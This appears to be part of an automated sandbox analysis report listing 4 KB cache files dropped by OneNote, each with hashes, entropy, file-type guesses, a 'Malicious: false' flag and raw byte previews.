Preview:	2...>...........~..................................................................................................................................................................................................&...L..t.X.............................&...L..t.X..............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...i.w1,..I.35G.[.g....N...^...........................................................................................................i.w1,..I.35G.[.g............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5160941816093423
Encrypted:	false
SSDEEP:	24:9WbVX9VGieIPpVvDXVuVVzFVyRYYdcQJ:97KXdc+
MD5:	ECAA26662173A38322574C513992A9F1
SHA1:	4F30AFF3CBA99ACF3ED830C64B9BE37C8DCA8294
SHA-256:	9B0BB33B6B160CD2C97AEF0F5E1F40D739E370FDDC906E16C7EAE5BF266D1C57
SHA-512:	45253AFFC5F5014A1D69481CFAB3D7C22C07BC22D8E97110CE5A3417E645FC9AA7E79AB6A97EB43062C7F1F3BCB564AE6C602B3F4D07A7BE4FBDC3F679F135BF
Malicious:	false
Preview:	........,.............................?..................................................................................................................................................................4.......4..9..M.T......C.......C....R.M...... y.Y.]lG...4... y..U...b.nM._.T.7..U...C....R.M......C............ y...... y.................................................. y...C.. y.\.... y.N.... y.N.).. y.N.9.. y.N.A..........................C....c..,.........................4..1...(...(.......U.s.e.r........ y...1... ..$....U.s.e.r......................iN..;J.h.C.......C....R.M......2................................4..... y................................4...c..,................... y.. y...1... ..$....U.s.e.r....... y...... y.Y.]lG...4...C.......C....R.M.......4..9..M.T......4......iN..;J.h............................>...............C....R.M...................................................c..,................... y.. y.. y...1... ..$....U.s.e.r...........U.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7229815983377732
Encrypted:	false
SSDEEP:	6:jxfEQ8O4kS/8V2Sy7WO4yygl/WEjVqUGIx8CAXCkIdWWAXlaF0xcw1Ee0/K:KQlrG7LVyzEBIXngW9Xle0qQEe0/K
MD5:	710AE54499E9D2E1DA6C93C5E3A4147D
SHA1:	1804848C958404215C308578212E193182F0F054
SHA-256:	6769C64D062C11DE0E9E5A26D67DDD1CAB9C303457330CC1BDD9D094D7E5E4FF
SHA-512:	DF2797BFF7F0C238489A6657059F1C7DFE77CD47F54E0AE0901FD435D35894C3BC88EBD53ACEA5C8D5912F940AF4E739DBC43B1B760065B11B0D9F741F034351
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................1.^.....1.^'5?.K.M.y.h..&.x.....&.x..37D.....^..&.x..37D.....^..&.x.1.^'5?.K.M.y.h..1.^..............................&.x.....&.x.................................................&.x..!..&.x\....&.xN....................................................1.^..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........&.x..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............2..L.J.M.........N...^............................................................................................................2..L.J.M.................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47892798161050276
Encrypted:	false
SSDEEP:	6:NTcm8m1OPYUm+DLflyLx8Olu3afR5ektqw1EXnG5ektS:VcmGAMDzlV38RMMqQE2MMS
MD5:	8E7BB909DEA334BD5426ABC44F4EF891
SHA1:	FEC579B536C27A8A0DE3EFEFDDABA8B3EFC12C4D
SHA-256:	72984FF58030467793E87F2D24099CAAD1F5125AED25D3C9CEC777D1A76CCB85
SHA-512:	9A3A917FD11F1347671790EA4FBF3EC1C4D80A2C54AC07C7DAC762359BA6C2930A783587150F94300224507D4E6419823877E5D6483D95828067125890753445
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................l.^.....l.^R.z.E.7.N............................l.^R.z.E.7.N....l.^..................................................l.^.....l.^.................................................l.^.....l.^\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...c.....M.;.....v....N...^...........................................................................................................c.....M.;.....v............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.732440652294679
Encrypted:	false
SSDEEP:	6:K0nCw/D6S4/WhZ+v6QRgZeDyP5MNx8felBkls0C/7elBkls031VGviw1E/Gva:KUCw/ue+TDyPS6eIW/7eIWc1QiQEWa
MD5:	4007668D2715E8F26E94702D8F63C2B1
SHA1:	0053F38D50211484CC827ED79AE26AA14594A194
SHA-256:	6EF7FCACFDCDCA09557E095E9AA39B3A5FDF5A0B15DD0B1AF26C03E5E5AB64FB
SHA-512:	72B8C71A45EE210AFBBEBA925481741D551B2943A9D8A3AB1CF5EA9DE793E6AD27B7E289FB9D8F4F3640F525C322A38F9BE778EC50186EA1E64B7FB92079351F
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................<W......<W.a+..@...Y1;.I~.n.....~.n.\?.N..mi.'$.<W.a+..@...Y1;.I<W..~.n.\?.N..mi.'$.~.n..............................~.n.....~.n.................................................~.n.."..~.n\....~.nN....................................................<W...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............~.n..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........>..fc.M.6o...nZ....N...^............................................................................................................>..fc.M.6o...nZ....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47692647667805066
Encrypted:	false
SSDEEP:	6:NTcAlIrxQHTWSDKFKJYBl/lyLx8Olu3afC3Acw1E73KK:VcAlgQH6SDve/lV38C3BQE73KK
MD5:	A118364C683294230609898A90317E69
SHA1:	7D0A00C37DCD5EB0A8EB952992905EFB58934A25
SHA-256:	356B7A77D883E271F6507EB99E1E48B69875A38CBF2D330A12DB34B1E3CF184C
SHA-512:	D24067F7B0566E1C98A91CA04FF6D93E5F73488A4E2E29E8FF82C05F843491937A770C6C22DD6093CA2B8E31C17BB1E95B11B6B516518DC0BA15EAE966D2DC6D
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................%.......%....\|5M..Sa.M..........................%....\|5M..Sa.M..%....................................................%.......%...................................................%.......%..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....q.RjxQD.^~>P..`....N...^............................................................................................................q.RjxQD.^~>P..`............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6413309458600812
Encrypted:	false
SSDEEP:	12:UeEwL0Y3ZCcnkNYKQQnkNYnQqMqQEL9QqM/K:UA0gZCckNbQQkNdqrHaq
MD5:	B7E000EF99A40769ADDA24ECA7FA85DF
SHA1:	F7A007ABA29E575E2E9E7A80F051730C44C87D3E
SHA-256:	8C3876BF3033DAEAD603DF4574A9120C937CA8CB00113569AFFA309B454DE0CC
SHA-512:	8A01298A060100DA3C43564771DA25EBDF7FA924F1463F16DF2E5D8CC018136FC91CB82300223AFAE451A81CB61775494F942A238649191A51B1D3C53A821D92
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................l.......l...rG.B.L..@~..........................l...rG.B.L..@~..l....................................................l.......l...................................................l...."..l..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s........... .Q.KI.'..O.......N...^............................................................................................................. .Q.KI.'..O...............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7910523900289081
Encrypted:	false
SSDEEP:	12:+wfExb59tlGUruB7ozsD43wsD4CawQEEM:+p59tlZuB7ozn3wnC
MD5:	CC1DB1715AFB89D6D7073D010284F47D
SHA1:	D935744E2BC73428F7E11C55DBFCA26D9639FB5B
SHA-256:	E96D0446B9CCB89992022C23B43D68EEC12AECEEDC082381C180479FFA2A6A59
SHA-512:	B6C8F925456731A9A3D203D559732DAE89294F0FD4672B54F7BFF2B9DFCA743700084B75CB987DADFF06606C003A8965BD25D2C233476D21942FAD1A34676496
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................:.......:...=.3O.U.V....B.......B...i@.Ad......B...i@.Ad......B..:...=.3O.U.V...:................................:.......:...................................................:....#..:..\....:..N.....................................................B...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............:....1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........VH..G.sB..yF.(J.....N...^...........................................................................................................VH..G.sB..yF.(J.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47715284878657704
Encrypted:	false
SSDEEP:	6:NTc1JwtrQt7hyLx8Olu3afiXlqw1E7jXlS:VcTwFw7hV38eqQE7hS
MD5:	259472B2A2F8506362684D515C352009
SHA1:	2E5E3D31A4AFF48515033EA8DB6616B5AEC34B95
SHA-256:	285D12ADC1BE85688101599EE65C2636E0E783FEDC23AD8011B0CB99D8AFCBE7
SHA-512:	AC3ADB8652F6BBD89215A4CAC2206BD757E968271841E3549F435501AC1AC928BFD1870C66AC8FCAFD6AA11D24282A4738BA6C232B621A0AB552B82B1A5C6229
Malicious:	false
Preview:	2...>...........~................................................................................................................................................................................................(..E..HL.et...........................(..E..HL.et........................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...Y.4....L...cK.......N...^...........................................................................................................Y.4....L...cK...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6978090823814594
Encrypted:	false
SSDEEP:	6:ga0CtmcdrL2LVr9drqylcCiuH4Um3sx8iDwVudWDwVheQlww1EK6QlM:ghCtm0M42x4/WDwVudWDwVhJlwQE+lM
MD5:	9454A74B73F8E90071EF5D698D4340F3
SHA1:	55185272213A16F8A113A14C201FCBD2A71452EA
SHA-256:	0216C384E8E915DBCE82CBF9FA1ED1E1E1194FFB171407AC16A7A67FE9F3D673
SHA-512:	DC5ACFD798B57D4F3A7862F5660F9D50DAE818909264CBF86308C1F58944B0F20E2BEF16525AF2F78E1D96ECAD79CBC3DD0B9FF5620F4FD14F3F839ED8FDCDBA
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................Rn......Rn-8..E.Q..t..frky.....rkyr.mxB...=X..rkyr.mxB...=X..rky..Rn-8..E.Q..t..f.Rn..............................rky.....rky.................................................rky..!..rky\....rkyN.....................................................Rn..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..........rky..1... ..$....L.i.v.e.C.o.n.t.e.n.t..............1.HBm.E..1.I......N...^............................................................................................................1.HBm.E..1.I..............................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9198104827034935
Encrypted:	false
SSDEEP:	12:zPgL2ZgkfQki62hEjCgVDS3kjtS0eDaUbcQEwUX0:zY5kokiONhS3kjmdYDX
MD5:	1E2B49F859E1D2F2A1EBAB0A2EC83147
SHA1:	CB740C4E901EF415281399D6EC5A3327C3FD0751
SHA-256:	ABF9EFBED26D2A0E11A6A7B8FED07016B8CE6D9AB7285144704DAEDB5E3039C5
SHA-512:	42B93B6B0006CE4A29C2B70F774C69A8AC4CD86169B1803071D25392672D7BD455CC19CF69BB27FF0DECF763FB9E0FFD29059F73B271DF3C216AAE11380B0CD1
Malicious:	false
Preview:	....>..................................................................................................................................................................................................../h....../h..b'M.=..K.TE.Z.......Z..g.`G....&:C.dA.;d.NA..]..}.fdA...Z..g.`G....&:C.Z.../h..b'M.=..K.TE./h...........Z.......Z...................................................Z...+...Z.\.....Z.N.....Z.N.).........................................../h..c..,.........................4..1...(...(.......1.6.............Z...1... ..$....1.6........Z.......Z..g.`G....&:C.dA......dA.;d.NA..]..}.f2................................/h......................................dA...c..,....................Z...Z...1... ..$....1.6............).?..7B......?....N...^............................................................................................................).?..7B......?............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5021684399921678
Encrypted:	false
SSDEEP:	12:KWJafXOFCtCu4qkJzUa5EUasXOT6sC3sluEUa1d6YhIpEUaId3ezEUauOFQEht:K3sluDol06Fslul6wplBEltOFl
MD5:	5692EDF8BB21DB62811B90A99BDC91B6
SHA1:	61127DE81D9DA586BD2C5B0EC31DE23598FD12B0
SHA-256:	204AF7C31910D6EB6488C323DD499BC0A02439B1B72FADB9F2FAC797628CF005
SHA-512:	50C64028E593F19B0B21687812A7DEA15A0A36F40DA72B44DE7A8BD497F3BCBC0707F2380BC8567DD2F054456E8B6700B570131826F23EDFF1F6539B556FB41D
Malicious:	false
Preview:	........................................................................................................................................................................................................ ....... ...zO@..>[...{...........:.O..p..lm.. ...zO@..>[...{. ..h.J..CA.>O....%h.J.....:.O..p..lm.............$g......$g..................................................$g...B..$g.\....$g.N....$g.N...$g.N.7..$g.N.@..........................h.J..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........$g...1... ..$....M.a.n.a.g.e.d.............h.J.....h.J..CA.>O....%$g......$g....]K.s..b.Q.2..................................h.J......................................c..,...................$g..$g...1... ..$....M.a.n.a.g.e.d...........~...5H...D.9...~.$g....]K.s..b.Q.$g......:.O..p..lm........>...............h.J..CA.>O....%.......................................... ...c..,...................$g..$g..$g...1... ..$....M.a.n.a.g.e.d...............~.......~...5H...D.9.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7166459237924785
Encrypted:	false
SSDEEP:	6:jxfEB0owEN41MyI1KMbculkQjdWpJx8CAXCkPjDWAXlXuEw1EUISuY:KyjMBfHpkeXn7D9XlXrQEUISn
MD5:	BD9DA4A4200FE67A80068B7FDECA6E0C
SHA1:	4D56EE24BDE3EE3EE2621191C759E8E3D595EECB
SHA-256:	4AFBDB7868F4AE681CCBADCE3D83100670969687598170BEC19E3A2E1B235B82
SHA-512:	DBE70E4FF4592A98E737F5A11B2EEF4AF8C5FD91B0B1835C360AE1BC8E353D8588F245BAF85B7C73C6430953614DEEF86C53D4E7FB8E56119D5AF60364732B9D
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................F.......F..7X>C..".}..N..G.......G.~.B..........G.~.B..........G..F..7X>C..".}..N.F................................F.......F...................................................F...!...F.\.....F.N......................................................G..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........F...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................NO>N...V.d......N...^...............................................................................................................NO>N...V.d..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4682428206653837
Encrypted:	false
SSDEEP:	6:NTcYsN34mA0vp/yLx8Olu3af96cZmw1EyS6cX0:VcOqRV38YTQEUc0
MD5:	FBB8281AA9EF8D5ABB5A35875FAAE5DA
SHA1:	3728B2C7307FF47FC3F14A42E47C826C7A8CC000
SHA-256:	93F67B82547DD3BEEDB76E02FF54AAEACF387B4EDD87EA314A431DC8D1E67F78
SHA-512:	F042DE244C2AB8E9E29DFA3A67B3038F6B08899F2E54C18D500598794364A20C3A54890E95AD9600D197D1497F5543A2283564A5404CE83AC471815224497BFA
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................bZZ.....bZZ.E..J.8j..7!.........................bZZ.E..J.8j..7!.bZZ..................................................bZZ.....bZZ.................................................bZZ.....bZZ\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...".a....E.....4......N...^...........................................................................................................".a....E.....4..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7302891034877619
Encrypted:	false
SSDEEP:	12:KUC45LqgjmqgbhehkPeIWZ7eIWc1gPwqQE3PwS:KUHLqg6qg8aP87efb
MD5:	4A1ED1E4AA6842B4B8ED0B32B5BDA566
SHA1:	411241279AC010F36FFC6AAC9C7F2DEAB5387849
SHA-256:	CC31CEC32303FC0CBCF60D409634AE81D7CEC5E4BC3C89C2601C8CEE24224896
SHA-512:	8A6C689975BB560718C5C31CFE0D7D9A412EFD3E1781B41FFE0810E0AC0D8D9AF0E39CC443FA8C988844769A0851180B41E3BF6059D1EE7602A8F52E4F9983FC
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................=x......=x.g.NCB..'Hw)..D.......D..?.9D..E...Q.=x.g.NCB..'Hw)..=x..D..?.9D..E...Q.D................................D.......D...................................................D...."..D..\....D..N....................................................=x...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............D....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........,.u.`.E...a{.l.....N...^............................................................................................................,.u.`.E...a{.l.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47578777443514786
Encrypted:	false
SSDEEP:	6:NTce/H8AntG8Anr+AttHlKqlyLx8Olu3afhaFlww1E8MZaFlM:Vce/cAntrAnqaKqlV38hsiQE8MZsa
MD5:	4B18361F9886C25489646183E298F56A
SHA1:	655E26D0EE51AFCD8A1FC62B923AF57B46F0F941
SHA-256:	B486F80660BB695979FB4AB5A339AEC793DB49E98AF3C6F2228DC8D1330A1A87
SHA-512:	6289576620A3C8FF401544B0400A86A434A811FB31FDF0575771186A74B8345538C9A22451C489E8925DE3AB2177981E7452BB1DEE5A32B439B07DA06CCD1BC6
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................)$......)$$..)B...%0(...........................)$$..)B...%0(...)$...................................................)$......)$..................................................)$......)$\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...,2...5.M...7.>C.....N...^...........................................................................................................,2...5.M...7.>C.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6546246451864841
Encrypted:	false
SSDEEP:	12:UeEPtmJl8/6THNnkNYKQQnkNYHzQEY3/:U28/OkNbQQkNs
MD5:	949028B04F8850C81DFDA4A066B9F506
SHA1:	B88BB02E28603462E27C6BC460FFDE28445BBBF9
SHA-256:	2250F5B007FD7A2FF8E30F9C2B869E4936FDD1C9EEAE5FABEF94A3DF2E18481A
SHA-512:	67089A5C2F33E6C873920BACF2FE1E8F305CD626BC1539F6EB6BC037FA1D77832DE79097221FBF86F348CB984FA505B4C79F84E82ECA377BC5F2111FB4B77708
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................P.......P....x.G.$.)..5.........................P....x.G.$.)..5.P....................................................P.......P...................................................P...."..P..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...........q.M=.K..9........N...^.............................................................................................................q.M=.K..9................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7983517582108522
Encrypted:	false
SSDEEP:	12:+wfEwcXZfZReWllTFsD4awsD4CqqqQExq/K:+YcJxReW/pnawnRR1
MD5:	66F9175A806D273E390F789A7F0FD270
SHA1:	619E99E1B1471D5142A511369CB24ECA5A92757A
SHA-256:	61C302A0413257E251586B8FA0C38F8FF92B598C3EA1E44192A9E69B5FF91A02
SHA-512:	059CFC73D5080A38586500F83C21967346DD1B006EEF1B7663277265D4AE373191C81734CF487C175D5AB0B65E371F035D55762BC62902D418F5910C7F3918AB
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................>(3.....>(3..=.H..\..F.y.......y...L.yH.\|.Y.@?.y...L.yH.\|.Y.@?.y...>(3..=.H..\..F.>(3..............................>(3.....>(3.................................................>(3..#..>(3\....>(3N....................................................y....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............>(3..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........s.6i.I....\X......N...^............................................................................................................s.6i.I....\X......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48112371365632567
Encrypted:	false
SSDEEP:	6:NTcYI8E4m/L2gKqlyLx8Olu3afCFw1Emt:VcAncXlV38GQEq
MD5:	B2E634A49FBFF4B15C58D9FCC6E82784
SHA1:	AF87BFC0DC7E5EE299A2842C9AEB1D7172089E9C
SHA-256:	25154AEF339C4E9B0707FF6AB2F9DD2E967313D505093C72D5F9410B94D41F57
SHA-512:	4A3AFBCF0F8853A15DBFF32AFEDDB1196B1B67CBFAD0E1AF827DDEF32837BA9C5371CC8F4B5B0D95E775CC88B0D7C19F8823091E6BBEDFDE9D0DBE0416A185B1
Malicious:	false
Preview:	2...>...........~..................................................................................................................................................................................................^.;.E.(...rl............................^.;.E.(...rl.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...K.y<.(.K.K..p$.4....N...^...........................................................................................................K.y<.(.K.K..p$.4............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5361682434865929
Encrypted:	false
SSDEEP:	24:9W1fkgdezC1lOe3BEK6WGIophltp6co8Qdpo:9gdezTexqs
MD5:	193E6FF0505999E12B55372E0544046B
SHA1:	0665DFD8F42573639F69DD778CA99D6DB16A7520
SHA-256:	5E511756B930C4FFE7C38FC081A7DAEB54EF9799BA4A90B5A19021CC26928365
SHA-512:	C0F7C317D3F385ED18CA54EF66BE2147FEDA6B54F453415E2AEB9AAFB429F3876231584E79DB19D2B72128A1435234675AEF6173563CADACFB2A6CC26EE9E3F3
Malicious:	false
Preview:	........,.............................?..................................................................................................................................................................x.......x....EE.~>.....-.......-...t..G..R..sD..Y71...@.....I...Y7..x....EE.~>......x..-...t..G..R..sD#-.............Y7......Y7..................................................Y7..C...Y7\.....Y7N.....Y7N.)...Y7N.9...Y7N.A..........................-....c..,.........................4..1...(...(.......U.s.e.r.........Y7..1... ..$....U.s.e.r............Y7......Y71...@.....I..-.......-...t..G..R..sD.2................................x...Y7...................................x...c..,....................Y7..Y7..1... ..$....U.s.e.r..................:...L..^...-.......-...t..G..R..sD.-...t..G..R..sD#-......:...L..^........U.Y-.\M.DA.m.2..U......>................x....EE.~>...................................................c..,....................Y7..Y7..Y7..1... ..$....U.s.e.r............U......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6935995222066765
Encrypted:	false
SSDEEP:	6:jxfEqt5o7UYvoUClyY8USq7x8CAXCkM5WAXl3pdw1Eghp1:Kqtu7abBmXn49Xl3fQEghT
MD5:	AC78B0C8A0B8E7C01739B8165EB08D1D
SHA1:	CD27526E5E744CB2E4981FB58A4138D03F85ADD4
SHA-256:	5CB3ADF4FC6A254FD93B8C114285A9DC5934533CD4246B08619E79D38B7D1B36
SHA-512:	FB65308BBE27983528930D6D726B261EF9A5E03A5AB97EEB1EEAF7051BA6000AE6F423C2F6D99B31601E87BF39A279D2594B828AA65E4252DC51AC33ECB450AF
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................h.......h..^&h.@.T3.f.d^sl.....^sl=.A...`.5.Qh..^&h.@.T3.f.dh...^sl=.A...`.5.Q^sl..............................h.......h...................................................h....!..h..\....h..N....................................................^sl..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........h....1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............ywt..C.$.>......N...^.............................................................................................................ywt..C.$.>..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48302807621974864
Encrypted:	false
SSDEEP:	6:NTcUvK/RTrUtuXlKatyLx8Olu3afu0sbwxcw1EXdsbw/K:VcUvEnNnV38u9wqQEXew/K
MD5:	C087F9660B3494B0CDCCD623FD69944C
SHA1:	6B6CB8A533C095566ADD18441CE1214B1D01837F
SHA-256:	D1E388C48230D0692E1ACEC05A59575C2A744539F58584A6828E02565A4058D7
SHA-512:	837547EBF1EB332130387AB7F7053973436EAD66F5807125B8EA63B459BE8652727B6A6A543E6A065C944A3A1F6F8A6C88F19DA45FB42A48DB6D6077501F57F6
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................l.......l.<v.B..hW..v.........................l.<v.B..hW..v.l....................................................l.......l...................................................l.......l.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....,....O....y.......N...^............................................................................................................,....O....y...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7314034245123762
Encrypted:	false
SSDEEP:	12:KUC7xUNxUVxS+eIWO7eIWc1hYFQEgY+K:KUSIUxS+v7MF7+
MD5:	9BC346BD7D6D3C54FAC9E9C24181852A
SHA1:	19B4D27D946A9A77B38FCCCC25DEBFBF6E048515
SHA-256:	8D126E75CC424FA22B3F38FAC74A705D721A5C9B4FB81C3A15EE4C6429CE3F9A
SHA-512:	0B41B95EFE3288FB947359D750CB378A29AE4E0753E3B149379F8ADE6C1A98B4E27DF096404C0EEC9EE2ACCA0C6BEF41FCC3AF69A400739DFBA922AC0E3BD861
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................../......./..u.O./.i..-K..........+.A..6G..t...+.A..6G..t...../..u.O./.i..-K../................................/......./.................................................../.."..../\....../N........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................/..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........+Q.]..D..f.5.d.....N...^...........................................................................................................+Q.]..D..f.5.d.....................................................................................................................................................................................................................................................

